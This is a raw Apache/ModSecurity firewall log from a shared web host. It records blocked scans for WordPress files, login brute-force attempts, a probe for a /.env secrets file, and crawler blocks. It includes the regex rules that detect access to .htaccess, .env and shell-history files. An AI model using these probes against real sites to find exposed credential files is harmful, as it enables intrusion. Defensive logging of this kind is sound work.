[Tue May 26 17:59:57.844257 2026] [security2:error] [pid 946381:tid 946578] [client 34.41.98.139:53119] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "staging.unsobered.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahWSRdiTu5WG4Dm5WpoP3AAAAEM"]
[Tue May 26 17:59:58.153446 2026] [security2:error] [pid 946381:tid 946524] [client 34.41.98.139:51635] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "staging.unsobered.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahWSRtiTu5WG4Dm5WpoP6AAAAA0"]
[Tue May 26 17:59:58.466976 2026] [security2:error] [pid 946381:tid 946633] [client 34.41.98.139:56408] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "staging.unsobered.com"] [uri "/website/wp-includes/wlwmanifest.xml"] [unique_id "ahWSRtiTu5WG4Dm5WpoP8AAAAHo"]
[Tue May 26 17:59:58.788292 2026] [security2:error] [pid 946381:tid 946551] [client 34.41.98.139:65438] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "staging.unsobered.com"] [uri "/news/wp-includes/wlwmanifest.xml"] [unique_id "ahWSRtiTu5WG4Dm5WpoP-gAAACg"]
[Tue May 26 17:59:59.079679 2026] [security2:error] [pid 946381:tid 946533] [client 34.41.98.139:60729] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "staging.unsobered.com"] [uri "/2018/wp-includes/wlwmanifest.xml"] [unique_id "ahWSR9iTu5WG4Dm5WpoP_wAAABY"]
[Tue May 26 17:59:59.380335 2026] [security2:error] [pid 946381:tid 946563] [client 34.41.98.139:60789] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "staging.unsobered.com"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahWSR9iTu5WG4Dm5WpoQCwAAADQ"]
[Tue May 26 17:59:59.702946 2026] [security2:error] [pid 946381:tid 946550] [client 34.41.98.139:62230] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "staging.unsobered.com"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahWSR9iTu5WG4Dm5WpoQEAAAACc"]
[Tue May 26 17:59:59.715924 2026] [security2:error] [pid 946381:tid 946560] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSR9iTu5WG4Dm5WpoQBwAAADE"]
[Tue May 26 18:00:00.076005 2026] [security2:error] [pid 946381:tid 946628] [client 34.41.98.139:59445] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "staging.unsobered.com"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahWSSNiTu5WG4Dm5WpoQHQAAAHU"]
[Tue May 26 18:00:00.130650 2026] [security2:error] [pid 946381:tid 946521] [client 208.91.198.85:35906] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "freshmindsolutions.com"] [uri "/wp-content/uploads/2023/03/logo-fms-1.jpg"] [unique_id "ahWSSNiTu5WG4Dm5WpoQHgAAAAo"]
[Tue May 26 18:00:00.406921 2026] [security2:error] [pid 946381:tid 946512] [client 62.60.130.228:57349] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahWSSNiTu5WG4Dm5WpoQHwAAAAE"], referer: https://www.bing.com/
[Tue May 26 18:00:00.582297 2026] [security2:error] [pid 946381:tid 946511] [client 34.41.98.139:63624] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "staging.unsobered.com"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahWSSNiTu5WG4Dm5WpoQJgAAAAA"]
[Tue May 26 18:00:00.764807 2026] [security2:error] [pid 946381:tid 946576] [client 62.60.130.228:50475] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahWSSNiTu5WG4Dm5WpoQKgAAAEE"], referer: https://t.co/
[Tue May 26 18:00:00.881705 2026] [security2:error] [pid 946381:tid 946581] [client 34.41.98.139:59390] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "staging.unsobered.com"] [uri "/media/wp-includes/wlwmanifest.xml"] [unique_id "ahWSSNiTu5WG4Dm5WpoQMQAAAEY"]
[Tue May 26 18:00:01.270574 2026] [security2:error] [pid 946381:tid 946552] [client 34.41.98.139:62396] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "staging.unsobered.com"] [uri "/wp2/wp-includes/wlwmanifest.xml"] [unique_id "ahWSSdiTu5WG4Dm5WpoQQQAAACk"]
[Tue May 26 18:00:01.554213 2026] [security2:error] [pid 946381:tid 946556] [client 34.41.98.139:62223] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "staging.unsobered.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahWSSdiTu5WG4Dm5WpoQTAAAAC0"]
[Tue May 26 18:00:01.864921 2026] [security2:error] [pid 946381:tid 946597] [client 34.41.98.139:60560] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "staging.unsobered.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahWSSdiTu5WG4Dm5WpoQVwAAAFY"]
[Tue May 26 18:00:02.200605 2026] [security2:error] [pid 946381:tid 946637] [client 34.41.98.139:52914] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "staging.unsobered.com"] [uri "/sito/wp-includes/wlwmanifest.xml"] [unique_id "ahWSStiTu5WG4Dm5WpoQXwAAAH4"]
[Tue May 26 18:00:02.220578 2026] [security2:error] [pid 946381:tid 946549] [client 62.60.130.228:63622] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahWSStiTu5WG4Dm5WpoQYAAAACY"], referer: https://www.facebook.com/
[Tue May 26 18:00:02.408687 2026] [security2:error] [pid 946381:tid 946589] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSSdiTu5WG4Dm5WpoQVQAAAE4"]
[Tue May 26 18:00:02.671183 2026] [security2:error] [pid 946381:tid 946439] [remote 74.7.241.58:39440] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWSStiTu5WG4Dm5WpoQcAAALzk"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/mosykay.com/account/lang/th
[Tue May 26 18:00:04.780787 2026] [security2:error] [pid 946381:tid 946514] [client 89.146.65.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahWSTNiTu5WG4Dm5WpoQmwAAAAM"]
[Tue May 26 18:00:05.052281 2026] [security2:error] [pid 946381:tid 946594] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSTNiTu5WG4Dm5WpoQpgAAAFM"]
[Tue May 26 18:00:05.135982 2026] [security2:error] [pid 946381:tid 946604] [client 49.12.82.48:51536] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWSSNiTu5WG4Dm5WpoQHAAAXXk"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:00:07.616561 2026] [security2:error] [pid 946381:tid 946635] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWST9iTu5WG4Dm5WpoQ4wAAAHw"]
[Tue May 26 18:00:10.004047 2026] [security2:error] [pid 946381:tid 946580] [client 176.65.139.232:27560] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.samayikprasanga.in"] [uri "/.env"] [unique_id "ahWSUtiTu5WG4Dm5WpoRJgAAAEU"]
[Tue May 26 18:00:10.079543 2026] [core:crit] [pid 946381:tid 946594] (13)Permission denied: [client 66.249.70.137:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:00:10.131450 2026] [security2:error] [pid 946381:tid 946635] [client 114.119.152.54:56945] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "adityacreations.co.in"] [uri "/robots.txt"] [unique_id "ahWSUtiTu5WG4Dm5WpoRKgAAAHw"]
[Tue May 26 18:00:10.363319 2026] [security2:error] [pid 946381:tid 946598] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSUdiTu5WG4Dm5WpoRJAAAAFc"]
[Tue May 26 18:00:12.381442 2026] [security2:error] [pid 946381:tid 946519] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSU9iTu5WG4Dm5WpoRWwAAAAg"]
[Tue May 26 18:00:13.649961 2026] [security2:error] [pid 946381:tid 946579] [client 91.239.191.237:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSVdiTu5WG4Dm5WpoReQAAAEQ"]
[Tue May 26 18:00:14.990017 2026] [security2:error] [pid 946381:tid 946607] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSVtiTu5WG4Dm5WpoRkgAAAGA"]
[Tue May 26 18:00:17.871250 2026] [security2:error] [pid 946381:tid 946514] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSWdiTu5WG4Dm5WpoR1gAAAAM"]
[Tue May 26 18:00:18.881035 2026] [security2:error] [pid 946381:tid 946535] [client 178.20.45.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWSWtiTu5WG4Dm5WpoR-wAAABg"], referer: http://www.anujtradingco.com/features/pie-chart-progress-bar/
[Tue May 26 18:00:19.330189 2026] [security2:error] [pid 946381:tid 946570] [client 178.20.45.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWSW9iTu5WG4Dm5WpoSBwAAADs"], referer: http://anujtradingco.com/features/pie-chart-progress-bar/
[Tue May 26 18:00:19.810724 2026] [security2:error] [pid 946381:tid 946489] [remote 49.204.150.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWSW9iTu5WG4Dm5WpoSAgAAaGs"]
[Tue May 26 18:00:20.405449 2026] [security2:error] [pid 946381:tid 946601] [client 114.119.134.121:22607] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "triviewsolutions.com"] [uri "/contact-us"] [unique_id "ahWSXNiTu5WG4Dm5WpoSIgAAAFo"], referer: https://triviewsolutions.com/contact-us
[Tue May 26 18:00:20.578783 2026] [security2:error] [pid 946381:tid 946580] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSXNiTu5WG4Dm5WpoSIAAAAEU"]
[Tue May 26 18:00:22.992754 2026] [security2:error] [pid 946381:tid 946485] [remote 74.91.224.220:42152] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.224.91.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWSXtiTu5WG4Dm5WpoSYgAAfGc"]
[Tue May 26 18:00:23.262404 2026] [security2:error] [pid 946381:tid 946521] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSXtiTu5WG4Dm5WpoSZgAAAAo"]
[Tue May 26 18:00:23.558534 2026] [security2:error] [pid 946381:tid 946491] [remote 74.91.224.220:42152] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.224.91.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWSX9iTu5WG4Dm5WpoScwAAVm0"], referer: https://filosha.com/wp-login.php
[Tue May 26 18:00:25.634356 2026] [security2:error] [pid 946381:tid 946609] [client 66.249.64.109:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWSYdiTu5WG4Dm5WpoStgAAAGI"]
[Tue May 26 18:00:25.634723 2026] [security2:error] [pid 946381:tid 946625] [client 66.249.64.109:65066] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWSYdiTu5WG4Dm5WpoStAAAAHI"]
[Tue May 26 18:00:25.916897 2026] [security2:error] [pid 946381:tid 946525] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSYdiTu5WG4Dm5WpoSswAAAA4"]
[Tue May 26 18:00:28.290606 2026] [security2:error] [pid 946381:tid 946517] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSY9iTu5WG4Dm5WpoS8wAAAAY"]
[Tue May 26 18:00:30.816747 2026] [security2:error] [pid 946381:tid 946579] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSZtiTu5WG4Dm5WpoTNAAAAEQ"]
[Tue May 26 18:00:33.255296 2026] [security2:error] [pid 946381:tid 946409] [remote 209.42.19.17:32792] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.19.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWSadiTu5WG4Dm5WpoTawAAEhs"]
[Tue May 26 18:00:33.613174 2026] [security2:error] [pid 946381:tid 946584] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSadiTu5WG4Dm5WpoTcQAAAEk"]
[Tue May 26 18:00:33.681016 2026] [security2:error] [pid 946381:tid 946427] [remote 180.93.137.9:59136] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 9.137.93.180.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWSadiTu5WG4Dm5WpoTeAAADi0"]
[Tue May 26 18:00:33.868982 2026] [security2:error] [pid 946381:tid 946500] [remote 51.91.98.45:54896] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWSadiTu5WG4Dm5WpoTewAAOnY"]
[Tue May 26 18:00:34.015919 2026] [security2:error] [pid 946381:tid 946404] [remote 178.156.182.155:36130] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 155.182.156.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWSadiTu5WG4Dm5WpoTgQAADRY"]
[Tue May 26 18:00:34.143853 2026] [security2:error] [pid 946381:tid 946509] [remote 51.91.98.45:54896] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWSatiTu5WG4Dm5WpoTggAAFn8"], referer: https://preetishah.moes-art.com/wp-login.php
[Tue May 26 18:00:34.190817 2026] [security2:error] [pid 946381:tid 946424] [remote 180.93.137.9:59136] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 9.137.93.180.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWSatiTu5WG4Dm5WpoTgwAAJSo"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:00:35.293949 2026] [security2:error] [pid 946381:tid 946621] [client 67.215.242.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWSatiTu5WG4Dm5WpoTmgAAAG4"], referer: http://anujtradingco.com/
[Tue May 26 18:00:35.493332 2026] [security2:error] [pid 946381:tid 946601] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSa9iTu5WG4Dm5WpoToAAAAFo"]
[Tue May 26 18:00:35.655963 2026] [security2:error] [pid 946381:tid 946539] [client 47.128.47.132:40368] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cicodev.org"] [uri "/en/programs-and-campaigns/cross-cutting-programs"] [unique_id "ahWSa9iTu5WG4Dm5WpoTqwAAABw"]
[Tue May 26 18:00:36.332566 2026] [security2:error] [pid 946381:tid 946507] [remote 113.178.54.136:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWSbNiTu5WG4Dm5WpoTtQAAaH0"]
[Tue May 26 18:00:38.745685 2026] [security2:error] [pid 946381:tid 946571] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSbtiTu5WG4Dm5WpoT7AAAADw"]
[Tue May 26 18:00:39.098653 2026] [security2:error] [pid 946381:tid 946443] [remote 47.128.47.107:40472] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cicodev.org"] [uri "/programme-securite-alimentaire-et-nutritionnelle-accaparement-des-terres/"] [unique_id "ahWSb9iTu5WG4Dm5WpoT_QAABD0"]
[Tue May 26 18:00:40.963460 2026] [security2:error] [pid 946381:tid 946601] [client 23.236.139.109:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWScNiTu5WG4Dm5WpoUKQAAAFo"], referer: https://www.anujtradingco.com/
